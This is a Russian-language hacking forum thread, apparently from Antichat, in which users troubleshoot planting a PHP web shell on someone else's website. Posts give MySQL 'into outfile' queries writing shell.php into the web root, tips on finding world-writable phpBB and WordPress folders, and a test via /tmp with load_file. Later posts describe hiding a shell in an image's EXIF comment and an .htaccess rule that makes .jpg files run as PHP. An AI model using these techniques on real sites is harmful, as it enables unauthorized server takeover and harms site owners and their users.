 |
|
13.07.2012, 16:37
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от kactetus
подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет
прав нет на запись туда, очевидно.
|
|
|
20.10.2012, 15:32
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от kactetus
подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет
Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images
она обычно открыта на запись...
|
|
|
|
20.10.2012, 17:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от kactetus
подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет
Убедись что БД и сам сайт находится на одном хостинге!
|
|
|
|
20.10.2012, 17:59
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Сообщение от Sharp.Net
Попробуй найти папку с изображениями, например она может быть тут /home/site.ru/html/images
она обычно открыта на запись...
1) зачем тему апать?
2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно.
3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту.
Например если это phpbb=>cache ,store
Wp=>upload,wp-content/themes/%тема%/
И т.д.
|
|
|
|
21.10.2012, 22:45
|
|
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами:
7258646
Репутация:
1
|
|
Сообщение от blesse
1) зачем тему апать?
2)error code 13 -недостаточно прав на запить.Папка с изображениями редко имеет права на запись если уж права расставлены более менее правильно.
3)Я в данном случае пытаюсь определить смс на который сайт крутится ,а дальше гугли ее архитектуру и ищи папки с правами 0777 по дефоту.
Например если это phpbb=>cache ,store
Wp=>upload,wp-content/themes/%тема%/
И т.д.
тема требовала ответа, вот и ответил. Раз были уязвимости, какая может речь идти о грамотной настройке и распределении прав?!
|
|
|
|
22.10.2012, 08:20
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Неплохо бы сначала
select '' from mysql.user into outfile '/tmp/1.php'
select load_file('/tmp/1.php')
проверять...
Если всё работает - то FILE_PRIV в норме. И вот только тогда начинать "угадывать" папку для заливки шелла
|
|
|
|
03.12.2012, 10:54
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от kactetus
подскажите что делаю не так
узнал путь
/home/site.ru/html/phpmyadmin/
проверил привилегии - есть (Y)
выполняю запрос
select '' from mysql.user into outfile '/home/site.ru/html/phpmyadmin/shell.php'
получаю ответ:
Can't create/write to file '/home/site.ru/html/phpmyadmin/shell.php' (Errcode: 13)
пробывал и в
/home/site.ru/html/
все равно не хочет
Apparmor , либо нету прав на запись. Да и from mysql.user не нужен. Достаточно select '' into outfile '/home/site.ru/html/phpmyadmin/shell.php'
|
|
|
|
22.12.2012, 19:47
|
|
Новичок
Регистрация: 17.12.2010
Сообщений: 12
С нами:
8106806
Репутация:
0
|
|
Сообщение от None
8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...
Подробнее тут
Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?
|
|
|
|
28.04.2013, 15:36
|
|
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами:
7359446
Репутация:
-10
|
|
Попытался залить через phpmyadmin к сожелению ошибка
1045 - Access denied for user 'bd_hjgy'@'localhost' (using password: YES)
|
|
|
|
28.04.2013, 15:54
|
|
Новичок
Регистрация: 12.12.2008
Сообщений: 0
С нами:
9165024
Репутация:
0
|
|
Сообщение от airatos
Че то этот метод у меня не работает. Просто картинка в браузере открывается и все. Как правильней надо делать?
Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение?
Из той же статьи:
Создаём файлик .htaccess, и вписываем в него следующее:
PHP код:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
